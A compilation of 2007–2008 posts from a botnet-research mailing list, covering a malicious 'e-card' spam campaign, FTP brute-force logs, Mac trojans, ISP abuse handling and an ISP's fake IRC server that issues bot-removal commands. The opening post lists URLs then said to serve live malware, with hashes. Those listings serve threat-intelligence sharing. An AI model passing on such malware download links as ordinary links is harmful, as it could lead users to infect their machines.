Re: [botnets] Another bogus "greeting card" spamming a malware URL
There are quite a few of these, it is a pretty big campaign. Im pretty sure these active sites were compromised, however I haven't done analysis on the binaries yet. Live drops: LIVE: http://faunarium.net/e-card.exe MD5: 706b12f636f2dc52ae32f26ad33a9b10 http://www.virustotal.com/analisis/50bf6f61971f349a5de651aa5515607f LIVE: http://turismoaq.it/e-card.exe MD5: 914f787560174ca42dedac998462afb4 http://www.virustotal.com/analisis/dc2eaffa46195d448518165cd247cead Down: http://63.167.82.161/e-card.exe 404/Error Pages: http://emilimport.com/e-card.exe 404/Error Pages: http://freaky-minds.de/e-card.exe 404/Error Pages: http://kkvtombeek.be/e-card.exe 404/Error Pages: http://leschevaliersdemines.be/e-card.exe 404/Error Pages: http://riccoboniholding.com/e-card.exe 404/Error Pages: http://www.mylady.st/e-card.exe James Pleger e: [EMAIL PROTECTED] On Wed, Aug 27, 2008 at 6:02 PM, Gadi Evron <[EMAIL PROTECTED]> wrote: > Another bogus "greeting card" spamming a malware URL (again, one I've seen > for a few days now and still live): > > h ttp://u gm-records.de/e-card.exe > > Detection wise...Someone already sent it to VT: > > http://www.virustotal.com/analisis/50bf6f61971f349a5de651aa5515607f > > As usual, several days later detection is minimal. > >Gadi. > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law enforcement > upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] reviving this list, allowing sharing
I think that is a bit too high volume for this list, maybe throwing honeypot logs to an aggregator and then sending a daily digest would be more appropriate. James Pleger e: [EMAIL PROTECTED] On Wed, Aug 27, 2008 at 6:10 PM, Jeremy <[EMAIL PROTECTED]> wrote: > I propose that each and every one of us on this list configure our > nepenthes boxes with the email address of this distribution list, so > we can share information about new botnet clients in real time. > > Thoughts? > > -Jeremy > > On Wed, Aug 27, 2008 at 4:41 PM, Gadi Evron <[EMAIL PROTECTED]> wrote: >> To report a botnet PRIVATELY please email: [EMAIL PROTECTED] >> -- >> Hi. When this list was started a while back a lot of sharing and discussion >> was happening. >> >> This make us take a step back at the time. Today, when most of this >> information can do far more good than harm, it is my strong belief open >> information sharing on botnets, malcious web sites and similar subjects will >> be useful. >> >> Feel free to share data, and let's see how it goes. We, on our end will work >> to mitigate the risks you send in. >> >> Who is first? >> >>Gadi. >> ___ >> To report a botnet PRIVATELY please email: [EMAIL PROTECTED] >> All list and server information are public and available to law enforcement >> upon request. >> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets >> > > > > -- > -BEGIN PGP SIGNATURE- > Version: 1.0 > > 5468657365206172656E27742074686520626F747320796F75277265206C6F6F > 6B696E6720666F722E2E2E746865792063616E20676F2061626F757420746865 > 697220627573696E6573732E2E2E6D6F766520616C6F6E672E2E2E00 > -END PGP SIGNATURE- > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law enforcement > upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Spam botnet discovered
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --Yea, he is... I think the main reason for that is that this list is public and is archived by mailing list archives. When google picks up those sites, they index the data and that is generally not a good thing. I hope you don't get a bad impression, as the last few emails I have seen from you have been useful and are nice to see for a change. Thanks, James On Nov 5, 2007 9:21 AM, Interspace System Department < [EMAIL PROTECTED]> wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > Is it your list? You are moderator? > > > > Gadi Evron пишет: > > On Mon, 5 Nov 2007, Interspace System Department wrote: > >> The strange thing, that only you complaining about such behaviour ;) > > > > I am not complaining, I am dictating. > > > > Thanks again. > > > > > >> Anyway, these links is safe, as these bots spreading only through FTP > >> (yes, stolen ftp accounts). > >> > >> Have fun, > >> Dan > >> > >> Gadi Evron ÿÿ: > >>> On Mon, 5 Nov 2007, Interspace System Department wrote: > Hi Gadi, > I don't have time for all that "obfu/deobfu" games, take it as-is ;) > >>> > >>> I quite understand, but as much as I regret having to say it, take > >>> your very valuable information somewhere else. :) > >>> > >>> Let me explain my position: > >>> These links get indexed, and at that point more web servers becomes > >>> compromised. I'd go as far as saying people can now seed your log so > >>> that you infect them when you report it and people follow links. > >>> > >>> Ethics and secure sharing are a bitch, but we have to live with them. > >>> > >>> I hope you understand. > >>> > >>> > > Thanks, > Dan > > Gadi Evron ÿÿ: > > On Mon, 5 Nov 2007, Interspace System Department wrote: > >> To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > >> -- > >> Hi again! > >> > >> Hope you doing well ;) > > > > Thanka again for posting. :) > > > > When obfuscating links, www shoudl be made into w ww. > > > > > > >> > >> > >> > > > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law > enforcement upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --You are beating a dead horse here. The point of this whole thing was to say that "HEY, they are targeting a new platform other than windows". Not that it requires user interaction to install it. Honestly, think about it... this is how a bunch of the early malware was installed on the windows platform. By USER interaction... wanting to go to a porn site and needing xyz dialer to look at the pretty pictures. The other point is that mac users have a false sense of security... Honestly, how many mac users run AV? I know I don't on my iBook... The point about windows being less secure than osx is true(i agree with it), but in another sense it doesnt matter. If someone isn't patching they are both insecure. I am not a windows fanboy by any means, but the argument of OSX is more secure than Windows in my mind isn't a good point. I honestly don't care what is more secure out of the box... It is my job to keep things secure no matter what os or version is on them. If there is a remote exploit that can get me root on an unpatched osx(like there have been many security updates that fix), and I can get the same type of privs on an unpatched windows box then they are both "Insecure". Default setups honestly on windows have gotten much better that in prior years. However we aren't here to talk about windows versus linux versus mac. On Nov 4, 2007 2:15 PM, Kyle Lutze <[EMAIL PROTECTED]> wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > PinkFreud wrote: > > Gadi already made the point that the significance of this lies in > > professional malware authors taking notice of Apple. If this trojan > > was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction > > would be the same - 'wow, the malware authors are taking notice of a > > new platform!'. That *is* significant, and those who are chalking that > > reaction up to 'anti-Apple zealotry' are sorely mistaken. > > > fair enough, both your points there are quite valid and I wasn't > denying the significance of malware authors taking notice to apple, > just that this being considered in the wild is a bit overboard. > > > There is a second point being made here, too - Apple isn't exactly > > known for writing bug-free code (I've already given some examples > > earlier in this thread), and they're not exactly known for fixing bugs > > until they're absolutely forced to. This is liable to create problems > > down the road - given that the malware authors are now starting to take > > notice of Macs, they'll undoubtedly try a few exploits before long. I > > just hope Apple has patched all known holes by then... :) > > > > My point is, where's the bug in apple's code here? There's nothing > apple can do about human stupidity in ignoring all of the message > boxes before this trojan can be installed. > > _______ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law > enforcement upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] the heart of the problem [was: RE: mac trojan in-the-wild]
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- To be quite honest, I think there is also the fact that the majority of Apple users don't run AV or any type of protection suite because "Viruses are for Windows". I am not sure if that was discussed at all in this topic. I know that there are flaws with AV, but it provides a layer of protection... I don't think that this is a huge deal, other than the fact they are expanding their Horizon. This malware isn't a real surprise to me, I think that we will start seeing more malware targeting the linux desktop, with the rise in popularity of linux on desktops, as well as very cheap linux PC's. I imagine we will have a similar flood of threads, and media hype about that aswell. Just my two cents... and this may not have made any sense, as I am very tired right now... --James Pleger On 11/1/07, Gadi Evron <[EMAIL PROTECTED]> wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > On Thu, 1 Nov 2007, Thor (Hammer of God) wrote: > > But more importantly, let's look at things from the other side. Let's > > say I'm wrong, and that Gadi is right on target with his "hit hard" > > I'd say we are both right. > You look at it from a security researcher stand-point. There is nothing > interesting about user-interaction, and it is even kind of lame. > > >From a reasonable perspective, we refuse to believe people will act so .. > silly. > > > prediction and that we should be very concerned with this. Given the > > Not predicting, assessing. > > Criminal elements have a very clear cost/benefit calculation. For example, > they won't release a 0day such as WMF or ANI as long as their revenue > goals are met with published ones. They collect statistics on OS, browser, > language, which exploit got how many, etc. > > They have thousands on thousands of sites infecting users who surf (some > of them ad-based on real sites, or defaced sites such as forums that > remain with the same content only now infect people). Then there is also > spam directing people to these sites. > > Now, a criminal gang (could be the mob could be one guy) targets the mac. > So much so that they serve different malware by OS-type. > > As a security researcher looking at code, bits and bytes, you are simply > not usually following what's going on in operational security where things > are bleak. > > >From an operational security standpoint, this equates to what happened in > the world of the Internet back when Windows 98 was around. Not what > security features it had. > > > requirements here, that again being flagrant ignorance where all the > > above steps are executed (including the explicit admin part)-- what > > exactly are we supposed to do? If people are willing and able to go > > through the motions above what can we as security people do to prevent > > it? Far too many people in this industry are far too quick to point out > > how desperate the situation is at all turns, but I don't see many people > > offering real solutions. But you know, I have to say... If we are > > Things are in fact FUBAR. We need new ideas and new solutions as honestly, > although we want to feel we make a difference by taking care of this or > that malware or this and that C&C we are powerless and have not made a > real difference in the past 6 years while things got worse. > > We need new solutions and new ideas, and would be more than happy to have > new people exploring operational security. > > The current state of Internet security is you get slapped -- BAM! -- and > you write an analysis about it. (when speaking at ISOI I actually slapped > myself -- HARD -- when I said it on stage, not a good idea for future > reference). > > > really going to consider this "serious," and we are really going to > > define part of our jobs as being responsible for stopping people who > > have absolutely no concerns for what they do and are willing to enter > > their admin credentials into any box that asks for it, then I'd say that > > there is a *serious* misunderstanding about what security is, and what > > can be done about it-- either that, or I'm just in the wrong business. > > > > t > > Well, we can't choose the risks. They choose us. Sometimes they are cool, > sometimes they're not. > > I often start emails by saying "first off, this is not the end of the > world, the Sun will rise tomorrow and the Internet won't die today". I > tire of it. Of course the Internet won't die today, but it is Mac season. > > Apple is very much correct by not invest
Re: [botnets] FTP attack seen on echnaton.serveftp.com
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--
I agree that this could be distributed... However what you may be
seeing is the same group of script kiddies that are targeting you
block of hosts.
I have seen that a good majority of the bruteforcers use the same
exact dictionarys(much like the ssh bruteforcers), and use the exact
same toolkits.
I have caught like maybe 30-40 of these types of kits and they are all
basically the same. Same things that I see with sql SA bruteforcing
and SSH bruteforcing... Same kits used, which indicates that only a
few groups are doing it.
Just my 2 cents.
On 10/6/07, Mr. X <[EMAIL PROTECTED]> wrote:
> On 10/6/07, James Pleger <[EMAIL PROTECTED]> wrote:
> > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > --
> > This looks like standard ftp bruteforcing...
> >
> > Typical targets of this attacks are MS FTP Servers, they will target
> > the administrator account, so they can get that account password, and
> > then upload files and execute them, or otherwise compromise the box.
> >
> > I have seen this activity for many years, and more likely than not
> > isn't a targeted attack.
> >
> > On 10/6/07, Peter Dambier <[EMAIL PROTECTED]> wrote:
> > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> > > --
> > > Good morning,
> > >
> > > I have put the logs from my mailer and ftp-server
> > > together with my router and VoIP:
> > >
> > > Oct 5 12:09:34 voipd[406]: query_local_ipaddress: 62.227.220.143
> > >
> > > netdate("Oct-5","23:38:06","time3 +0.234 Fri Oct 5
> > > 23:38:03.000").
> > > xinetd_open("Oct-6","00:31:58","ftp","203.112.196.130").
> > > ftp_connect("Oct-6","00:32:02","203.112.196.130").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for
> > > user [Administrator]","Oct-6","00:32:03").
> > > ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication
> > > failures","Oct-6","00:33:00").
> > > xinetd_close("Oct-6","00:33:00","ftp").
> > > xinetd_open("Oct-6","00:33:00","ftp","203.112.196.130").
> > > ftp_connect("Oct-6","00:33:01","203.112.196.130").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for
> > > user [Administrator]","Oct-6","00:33:02").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for
> > > user [Administrator]","Oct-6","00:33:06").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for
> > > user [Administrator]","Oct-6","00:33:13").
> > > ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication
> > > failures","Oct-6","00:33:53").
> > > xinetd_close("Oct-6","00:33:53","ftp").
> > > xinetd_open("Oct-6","00:33:54","ftp","203.112.196.130").
> > > ...
> > > xinetd_close("Oct-6","03:06:22","ftp").
> > > xinetd_open("Oct-6","03:06:23","ftp","203.112.196.130").
> > > ftp_connect("Oct-6","03:06:33","203.112.196.130").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for
> > > user [Administrator]","Oct-6","03:06:34").
> > > ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for
> > > user [Administrator]","Oct-6","03:07:20").
> > > ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication
> > > failures","Oct-6","03:07:36").
> > > xinetd_close("Oct-6","03:07:36","ftp").
> > >
> > >
> > > Oct 6 03:08:22 dsld[381]: EVENT(80): Die Internetverbindung wird kurz
> > > unterbrochen, um der Zwangstrennung durch den Anbieter zuvorzukommen.
> > > Oct 6 03:08:23 dsld[381]: Channel 0 closed (physical)
> > > Oct 6 03:08:23 dsld[381]: internet: disconnected
> > > Oct 6 03:08:23 dsld[381]: EVENT(23): Internetverbindung wurde getrennt.
> > > Oct 6 03:08:24 multid[360]: ONLINE: now offline
> > > Oct 6 03:08
Re: [botnets] FTP attack seen on echnaton.serveftp.com
ot;ftp","203.112.196.130").
> ftp_connect("Oct-6","04:47:22","203.112.196.130").
> ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for user
> [Administrator]","Oct-6","04:47:22").
> ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for user
> [Administrator]","Oct-6","04:48:10").
> ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication
> failures","Oct-6","04:48:28").
> xinetd_close("Oct-6","04:48:28","ftp").
> xinetd_open("Oct-6","04:48:31","ftp","203.112.196.130").
> ...
> xinetd_close("Oct-6","04:56:37","ftp").
> xinetd_open("Oct-6","04:56:41","ftp","203.112.196.130").
> ftp_connect("Oct-6","04:56:45","203.112.196.130").
> ftp_complained("([EMAIL PROTECTED]) [WARNING] Authentication failed for user
> [Administrator]","Oct-6","04:56:46").
> ftp_complained("([EMAIL PROTECTED]) [ERROR] Too many authentication
> failures","Oct-6","04:57:40").
> xinetd_close("Oct-6","04:57:40","ftp").
> netdate("Oct-6","05:38:05","time3 +0.251 Sat Oct 6
> 05:38:02.000").
>
>
> Interestingly enough the attack survived a DSL disconnect
> and reconnect with changed IPv4 address.
>
> The hole of 90 minutes suggests they did not follow me via DNS or SIP.
>
> they only tried user [Administrator].
>
> nmap says they have no ports open. I did not try the complicated things :)
>
>
> Nothing suspicious in the exim (mailer) log.
> No other addresses seen.
>
> Kind regards
> Peter and Karin
>
> --
> Peter and Karin Dambier
> Cesidian Root - Radice Cesidiana
> Rimbacher Strasse 16
> D-69509 Moerlenbach-Bonsweiher
> +49(6209)795-816 (Telekom)
> +49(6252)750-308 (VoIP: sipgate.de)
> mail: [EMAIL PROTECTED]
> mail: [EMAIL PROTECTED]
> http://iason.site.voila.fr/
> https://sourceforge.net/projects/iason/
> http://www.cesidianroot.com/
>
> ___
> To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
> All list and server information are public and available to law enforcement
> upon request.
> http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
>
--
James Pleger
p: 623.298.7966
e: [EMAIL PROTECTED]
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Why ISP's and NSP's Love Botnets
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --Wow, you have my favorite ASNs there :) I really REALLY hope that there is a time in the near future when I can submit a complaint to an ISP and have some sort of peace of mind that it might be acted upon. I am kind of curious if the pressure is because their networks are being adversely affected by these infections, or if it is threats from upstream providers... /me sighs... On 9/21/07, Paul Ferguson <[EMAIL PROTECTED]> wrote: > > -BEGIN PGP SIGNED MESSAGE- > Hash: SHA1 > > - -- "James Pleger" <[EMAIL PROTECTED]> wrote: > > >I don't think that ISPs are going to care until there is a business model > >that will make them money(or save it) and not cost them a bunch of > >money/staff overhead. > > > >It costs a great deal to staff an abuse department that knows what they > >are doing, there isn't really any value for the ISP to take down a botted > >machine that is sending spam, unless it is effecting their core > business. > > > > > > Perhaps, but the pressure is mounting. > > Until that time, we have this: > > https://nssg.trendmicro.com/nrs/reports/rank.php?page=1 > > - - ferg > > -BEGIN PGP SIGNATURE- > Version: PGP Desktop 9.6.3 (Build 3017) > > wj8DBQFG9JMRq1pz9mNUZTMRAi87AJ961/RNFtepDJWJ/UVolAaTvMokPACgiHSt > 3xAOllvZNosx9+WUEWLv4K0= > =zrci > -END PGP SIGNATURE- > > > -- > "Fergie", a.k.a. Paul Ferguson > Engineering Architecture for the Internet > fergdawg(at)netzero.net > ferg's tech blog: http://fergdawg.blogspot.com/ > > > > -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Why ISP's and NSP's Love Botnets
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --I don't think that ISPs are going to care until there is a business model that will make them money(or save it) and not cost them a bunch of money/staff overhead. It costs a great deal to staff an abuse department that knows what they are doing, there isn't really any value for the ISP to take down a botted machine that is sending spam, unless it is effecting their core business. Just my two cents... Look at TTNET, they don't do anything about complaints(from what I can tell). On 9/21/07, PinkFreud <[EMAIL PROTECTED]> wrote: > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > On Fri, Sep 21, 2007 at 10:02:32PM +, John Fraizer babbled thus: > > *snip* > > > Again, there is no silver bullet. It is *NOT* the responsibility of the > > providers to force safe computing down the throat of their customers. > > I disagree with this. By your reasoning, it's not the responsibility > of the university I work for to make sure students don't put infected > machines on the network (we actually take a very proactive approach to > minimize the number of 'problem' machines we have on the network). > > To go back to your earlier analogy of a user enticing Joe Botherder, > you're right - there's little an ISP can do in that case. But when > you're talking about machines actively sending out spam/involved in a > DDoS/etc., then yes, it *is* the ISP's responsibility to do something. > > I'm not saying an ISP should be watching everything that goes on on > it's network at all times. However, when an abuse department is > contacted about a problem machine on the ISP's network, it is most > definitely the ISP's responsibility to investigate, attempt to contact > the owner, and as a last resort, pull it off the network. > > If an ISP weren't to take responsibility for the machines, who would? > The user? As you pointed out, that's rather unlikely. :) > > The real question is - what do we do with ISPs which ignore abuse > reports, like Turk Telekom, RDSNet, or QualityNet? > > > *snip* > > > ~john > > -- > PinkFreud > Chief of Security, Nightstar IRC network > irc.nightstar.net | www.nightstar.net > Server Administrator - Blargh.CA.US.Nightstar.Net > Unsolicited advertisements sent to this address are NOT welcome. > > -BEGIN PGP SIGNATURE- > Version: GnuPG v1.4.6 (GNU/Linux) > > iD8DBQFG9ILObDkJRSE/3qkRAvtpAJoCkSTQTkG+tDphQYrzadZwGWSRuACfYQY2 > NavCqdahxVgjMz3i52jrIUc= > =vobv > -END PGP SIGNATURE- > > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law > enforcement upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > > ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] botnet signature?
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --I can't speak for other researchers, but some of the message IDs that I have seen don't necessarily copy this format... However, this is just stuff that I have seen come to me. I don't have a huge spamtrap. Message-ID: <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]> Message-ID: <[EMAIL PROTECTED]> On 9/18/07, Matt Jonkman <[EMAIL PROTECTED]> wrote: > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > Can anyone verify they're seeing the same in other traps? > > Can anyone comment on any naturally occurring source or seed that'd > cause this repeating? > > If it's seen in more than one place I'll get together some snort sigs > for it. > > Matt > > PinkFreud wrote: > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > > -- > > > > > > > > > > Actually, the pattern appears to be 01c7fa35$ > > > > > > On Tue, Sep 18, 2007 at 05:03:17PM -0400, Jonathan Yarden babbled thus: > >> To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > >> -- > >> I have a spamtrap getting 80-100k messages/day and noted a pattern that > >> repeats in the Message-ID field: > >> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> Message-ID: <[EMAIL PROTECTED]> > >> > >> Obviously in this subset, you can clearly see the pattern...01c7fa > >> > >> My question to the list is whether this pattern appears in some of the > >> Storm Botnet email others are getting. > >> -- > >> Jon > >> > >> Those who make peaceful revolution impossible will make violent > >> revolution inevitable. > >> -- John F. Kennedy > > > > > > > > > > ___ > > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > > All list and server information are public and available to law > enforcement upon request. > > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > > -- > > Matthew Jonkman > Bleeding Edge Threats > US Phone 765-429-0398 > US Fax 312-264-0205 > AUS Phone 61-42-4157-491 > AUS Fax 61-29-4750-026 > http://www.bleedingthreats.net > > > PGP: http://www.bleedingthreats.com/mattjonkman.asc > > > ___ > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > All list and server information are public and available to law > enforcement upon request. > http://www.whitestar.linuxbox.org/mailman/listinfo/botnets > -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] Alternative Botnet C&Cs - free chapter from Botnets:The Killer Web App
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On 7/25/07, Craig Holmes <[EMAIL PROTECTED]> wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- As promised, I bought the book and finally received it (thanks for the slow turn around Amazon). I have begun reading it, and although I am only starting the third chapter I am wholly unimpressed. Before I discuss the text of the book, I am curious to know. Is it a print problem or do many of the graphics in the book look overly blurry or excessively jagged? Some of the pictures look like they were compressed to a monochrome bitmap of about 2k in size (see page 47). My experience with botnets seem to differ in many ways from the text in the book: The book begins by describing what SDBot, Agobot, GTBot, etc do. They include lists of ports and vulnerabilities that the given bot exploits, actions it may perform etc. The book doesn't make the point strong enough that a lot of code (especially SDBot code) started off as simply a public offering and evolved through many different trees by people with no organization. These trees criss-crossed without any knowledge of many of the contributors. In fact, as I recall SDBot (at least a couple of versions from sd) was released to the public without a single attack vector. It is my belief that this version is responsible for the most variants due to it's availability. The book seems to be making a point that bots are being used by organized crime. I think this point has been pushed on my fronts of this issue by many people, however I remain doubtful. In my experience with farmers (or bot herders as the book calls them) is that they're packet kiddies out to DoS their moronic buddies or enemies. The botnet was just a natural evaluation from Trinoo/TFN/Trinity/Kaiten or if they're even lamer then Backorifice, etc. Though I do certainly accept that some lone individuals use botnets for monitary gain (avert scams), I wouldn't classify it as organized. Look at the numbers given in the book: -4.5 Million active botnet computers -A small botnet is 10,000 computers That means that there are about 500 botnets active. The book states only a handful of cases that involved organized crime, possibly 5 cases. That means that they've identified at least 0.01% of the 500 botnets are being run by the big evil organized crime people. Not to say that proves them wrong, but it isn't enough evidence for me. I believe they are sensationalizing this fact quite a bit. The book paints a pretty diagram showing how people with their cam corders run from the movie theatre directly to their dorm and upload their bootlegs to topsites which are actually botnets. This is a silly notion. A great deal movies that are available on the internet today (and much software) are released by organized (though not by for profit) piracy groups (the 'scene'). These groups do use topsites, but they are FTP servers running on legitmate hardware (a member of the group may be a sysadmin at MIT for example). These topsites and groups are not even remotely affiliated with botnets (or at least weren't in 2002 which is when my experience dates to). The offenders identified (from Drink or Die, Razor1911, etc) wouldn't be caught dead touching a botnet, as it would do great damage to their reputation. Furthermore, these elite groups have very little use for clickthrough scams, distributed storage, or dos attacks. A bunch of these ftp servers being used are actually compromised servers. There is one german release group that i have found that does this alot, i don't remember their name, but they will compromise a server with a weak MSSQL SA account and then install a ftp daemon and serve their files. They target the sql servers i believe because they are typically decent servers with decent upload and space. That is just my 2 cents and what I have seen. I feel like the authors are making a far too liberal attempt at connecting the dots on many issues. I am also slightly disappointed as it seemed much of the book will be focused on general intrusion detection techniques, sandboxing, reporting etc and less on practical cases, motivation, C&C methods, encryption and more technical aspects of the bot itself. I will report my final thoughts when I complete the book. Craig On Sunday 08 July 2007 21:53, Thomas Raef wrote: > To report a botnet PRIVATELY please email: [EMAIL PROTECTED] > -- > Gadi, > > It's easier for people to just buy the book. I bought it about a month > ago and have read it a few time already. Nice work! ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p: 623.298.7966 e: [
Re: [botnets] [Dshield] ISP redirecting IRC traffic to attempt bot removal (fwd)
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- What I find curious about this is the supposed fact about them using dns redirection to do this. I think that might be misinformation, but the other stuff would be kind of difficult to differentiate between real IRC traffic and botnet traffic depending on how commands are issued/syntax. It is 6:00am here and I am really tired, so that may not have made sense. On 7/20/07, Gadi Evron <[EMAIL PROTECTED]> wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- -- Forwarded message -- Date: Fri, 20 Jul 2007 06:11:25 -0400 From: jayjwa <[EMAIL PROTECTED]> Reply-To: General DShield Discussion List <[EMAIL PROTECTED]> To: Dshield Mail List <[EMAIL PROTECTED]> Subject: [Dshield] ISP redirecting IRC traffic to attempt bot removal When blocking goes to far, part #2 (working title: First they came for email, now it's IRC) Background info: 1) http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/55016 2) The typical command for rbot/urxbot removal of the bot from the bot user's perspective is to issue a command such as /msg bot .remove, sometimes also "!" is the command prefix, but technically it can be anything. They seem to forgotten most bots require .login before accepting commands, but there may be some that do not. 3) The code for the server appears altered as well, as it announces multiple, different topics. Normally IRC servers do not do this for the same channel. Fri Jul 20 05:57:00 EDT 2007: *** Performing DNS lookup for [70.168.70.4] (server 4) *** DNS lookup for server 4 [70.168.70.4] returned (1) addresses *** Connecting to server refnum 4 (70.168.70.4), using address 1 ( 70.168.70. +4:6667) *** Looking up your hostname... *** Checking Ident *** No Ident response (They lie, I do most certainly run Identd) *** Welcome to the Internet Relay Network jayjwa *** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2 *** Your host is localhost[localhost/6667], running version 2.8/hybrid-6.2 *** This server was created Thu Dec 6 2001 at 11:52:49 EST *** localhost.localdomain 2.8/hybrid-6.2 oOiwszcrkfydnxb biklmnopstve *** There are 2 users and 0 invisible on 1 servers *** I have 2 clients and 0 servers *** Current local users: 2 Max: 2 *** Current global users: 2 Max: 2 *** Highest connection count: 2 (2 clients) (2 since server was (re)started) *** - localhost.localdomain Message of the Day - *** - Where's the kaboom? There was supposed to be an earth shattering kaboom. + *** End of /MOTD command. *** jayjwa ([EMAIL PROTECTED]) has joined channel #martian_ *** Mode change "+nt" on channel #martian_ by localhost.localdomain *** Users on #martian_: @Marvin_ jayjwa *** Topic for #martian_: .bot.remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: .remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: .uninstall *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: !bot.remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: !remove *** The topic was set by Marvin_ 3 sec ago *** Topic for #martian_: !uninstall *** The topic was set by Marvin_ 3 sec ago .bot.remove .remove .uninstall !bot.remove !remove !uninstall *** Mode for channel #martian_ is "+tn" *** Channel #martian_ was created at Fri Jul 20 05:46:57 2007 User [EMAIL PROTECTED] was not on the names list for channel +[#martian_] on server [4] -- adding them 05:51AM [1] jayjwa #martian_ (+nt) (Mail: 56) EPIC5 -- Type /help for help EPic> To sum this up for those not familiar with IRC, if I was a client of this ISP, and I tried to access the public IRC network irc.ablenet.org, my ISP's nameserver would return knowningly false information to send me to this fake server, which, once there, auto-logs me into a channel and attempts to interact with software I may or may not have running on my machine in an attempt to remove it from my machine. -- [RBL:Just A Bad Idea] Do not use DNS-RBL; Demand your ISP stop. Tell RoadRunner/Adelphia, Netzero,etc: don't trash your mail. 